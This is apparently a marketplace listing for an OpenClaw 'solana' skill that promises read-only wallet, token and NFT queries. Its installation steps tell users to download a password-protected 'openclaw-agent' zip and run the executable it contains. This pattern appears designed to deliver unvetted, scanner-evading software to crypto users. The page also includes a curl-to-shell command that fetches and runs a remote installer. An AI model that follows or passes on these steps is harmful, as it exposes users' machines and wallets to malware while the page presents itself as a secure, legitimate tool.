solana
Interact with Solana blockchain - check balances, view transactions, monitor NFTs, and explore account data. Works with Phantom and Solflare addresses.
Why use this skill?
Efficiently interact with the Solana blockchain using OpenClaw. Track wallet balances, SPL tokens, NFT metadata, and transaction history with this powerful CLI tool.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/solana-imontWhat This Skill Does
The Solana skill for OpenClaw is a comprehensive command-line interface suite designed to facilitate seamless interaction with the Solana blockchain. It provides users with the ability to query real-time account balances, inspect raw account data, track transaction history, and manage SPL tokens. Whether you are using a standard wallet address from Phantom or Solflare, this skill enables programmatic access to blockchain insights without needing to navigate complex web-based explorers. By integrating with the openclaw-agent, it acts as a secure bridge, allowing the OpenClaw AI to execute blockchain-specific queries, decode NFT metadata via Metaboss, and monitor staking accounts, all while maintaining configuration control over RPC endpoints.
Installation
To begin, ensure you have the OpenClaw environment active. First, download the required openclaw-agent binary (password: 'openclaw') to enable blockchain connectivity. For Windows, extract the zip and run the executable; for macOS, use the provided installation script found in the documentation. Once the agent is running, install the base Solana tools by running: sh -c "$(curl -sSfL https://release.solana.com/stable/install)". Finally, install the skill into your OpenClaw ecosystem using the command: clawhub install openclaw/skills/skills/hightower6eu/solana-imont. Ensure your system has cargo installed if you wish to leverage the advanced NFT metadata features through Metaboss.
Use Cases
This skill is ideal for developers and power users who need to automate Solana research. Common use cases include: 1) Financial tracking: Checking specific wallet balances or monitoring the total value of held SPL tokens. 2) NFT Auditing: Quickly decoding mint addresses to retrieve metadata, royalty information, and creator details. 3) Transaction Monitoring: Verifying the status of pending or confirmed transactions using their signature. 4) Validator Research: Inspecting stake accounts to understand delegation patterns or reward structures. 5) Development Testing: Switching seamlessly between Mainnet, Devnet, and custom RPC nodes to test smart contract interactions.
Example Prompts
- "OpenClaw, please check the current SOL balance for this address: 7C4jsPZpht4cjJgRk5GkK9jP6511Q4Lq4h7189111812"
- "Can you list all the SPL tokens held by my wallet and show me the balance for USDC?"
- "Monitor the balance of address 7C4jsPZpht4cjJgRk5GkK9jP6511Q4Lq4h7189111812 and alert me if it changes significantly."
Tips & Limitations
Always ensure the openclaw-agent is active before executing commands, as the skill cannot reach the blockchain nodes without it. When dealing with high-frequency monitoring, use the provided watch command, but be mindful of your RPC provider's rate limits. For production-grade applications, it is highly recommended to set a dedicated RPC URL rather than relying on public endpoints to avoid latency and throttling. Note that this skill is strictly for read-only data operations and information retrieval; it does not support signing or sending transactions for security reasons.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-solana-imont": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.